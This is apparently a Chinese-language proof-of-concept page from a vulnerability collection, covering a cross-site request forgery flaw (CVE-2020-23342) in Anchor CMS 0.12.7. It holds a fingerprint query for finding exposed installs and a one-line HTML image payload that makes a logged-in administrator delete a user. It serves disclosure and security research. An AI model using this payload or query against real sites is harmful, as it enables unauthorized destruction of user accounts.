Awesome-POC/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md
2024-11-06 14:10:36 +08:00

23 lines
509 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
## 漏洞描述
- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
## 网络测绘
```
"Anchor CMS" && body="themes/default/img/favicon.png"
```
## 漏洞复现
Anchor CMS使用Get方法进行敏感操作可以使用exploit.html进行删除用户等操作。
**exploit.html**
```html
<img src="http://target/anchor/index.php/admin/users/delete/21">
```
当管理员点击时删除ID为21的用户。